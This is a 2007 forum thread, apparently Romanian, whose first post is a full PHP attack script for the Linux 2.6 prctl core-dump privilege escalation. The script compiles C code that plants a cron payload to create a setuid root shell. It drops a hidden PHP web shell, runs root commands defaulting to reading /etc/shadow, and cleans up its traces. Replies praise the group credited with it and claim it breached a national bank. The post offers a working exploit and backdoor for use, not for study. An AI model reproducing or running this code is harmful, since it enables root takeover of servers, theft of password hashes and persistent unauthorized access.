kw3rln Posted June 30, 2007 Report Posted June 30, 2007 <?php /* ####################################### # # # PRIVATE! PRIVATE! PRIVATE! # # # # XOR CREW # # # # # ####################################### */ set_time_limit(0); if(isset($_POST['exploit_it'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { if($_POST['compiler'] == "none") { echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>'; end; } $cc = $_POST['compiler']; $prctl = '#!/bin/sh cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); if (getuid() == 0) { printf("\n[+] We have root!\n\n" ); system("/bin/sh"); system("$_POST[cmd]"); '; if(!stristr($_POST['shell'],"could not be found")) { $prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");'; } $prctl .= 'system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/core*"); system("exit"); } else { printf("\n[-] Failed.\n\n" ); system("rm -rf '.$_ENV["TMPDIR"].'/s"); } return 0; } __EOF__ '; $phpwrapper = '<?php if(isset($_GET[cmd])) { echo "<pre>"; echo passthru("'.$_POST['shell'].' -c \"$_GET[cmd]\""); echo "</pre>"; } ?>'; echo "<pre><div align='center'>"; $h = fopen("/tmp/a.sh", "w"); fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit...."; echo passthru("sh /tmp/a.sh"); echo passthru("$cc -o /tmp/s /tmp/s.c"); echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c"); echo "Running exploit...waiting about 4 minutes to see if exploit worked"; echo passthru("/tmp/getsuid"); echo passthru("/tmp/s"); echo "Cleaning up"; echo passthru("rm -rf /tmp/getsuid*"); echo passthru("rm -rf /tmp/s.c"); echo passthru("rm -rf /tmp/a.sh"); echo "Done!</div> </pre>"; } else { echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname(); } } else { ?> <div align="center"> <h4>PHP Attack Script</h4> <h5><?php echo php_uname(); ?></h5> <pre><div align="center"> Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?> Checking for cc or gcc............<?php $path = explode(":",$_ENV["PATH"]); $gotcc = FALSE; $gotgcc = FALSE; foreach($path as $dir) { if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) { $gotcc = TRUE; $pathtocc = $dir."/cc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) { $gotgcc = TRUE; $pathtogcc = $dir."/gcc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } } if($gotcc == FALSE && $gotgcc == FALSE) { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } ?> Checking for execute permissions..<?php $h = fopen("/tmp/test.sh","w"); fwrite($h,"#!/bin/sh"); fclose($h); system("sh /tmp/test.sh",$returnval); if($returnval == 0) { echo '[ <font color="#00CC00">OK</font> ]'."\n"; } else { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } passthru("rm -rf /tmp/test.sh"); ?> </pre></div><form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> <td> <select name="exploit"> <option selected="selected">Prctl 2.6.x exploit</option> </select> </td> </tr> <tr> <td><div align="right">Location and name for root shell:</div></td> <td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td> </tr> <tr> <td><div align="right">Location and name for php shell wrapper: </div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td> </tr> <tr> <td><div align="right">Commands to perform while root seperate multiple commands with ; : </div></td> <td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td> </tr> </table> </div> <div align="center"> <input type="hidden" name="compiler" value="<?php if(isset($pathtocc)) { echo $pathtocc; } elseif(isset($pathtogcc)) { echo $pathtogcc; } else { echo 'none'; } ?>" /> <input type="hidden" name="exploit_it" value="doit" /> <input name="submit" type="submit" value="Submit" /> After pressing submit it may take up to 4 minutes for the page to load depending on exploit. This is due to the exploit being run. If exploit fails the system may be patched or kernel may not be vuln. </div> </form> <?php } ?> Quote
Johnny Posted June 30, 2007 Report Posted June 30, 2007 imi place echipa asta XOR CREW , is buni daca nu ma insel ei au spart banca nationala din armenia si h4cky0u. Quote
katmai Posted June 30, 2007 Report Posted June 30, 2007 Mda destul de buni :wink: un simplu search cu prietenu meu de pahar si uite rezultatele pentru cei care vor sa afle mai multe click aici Quote
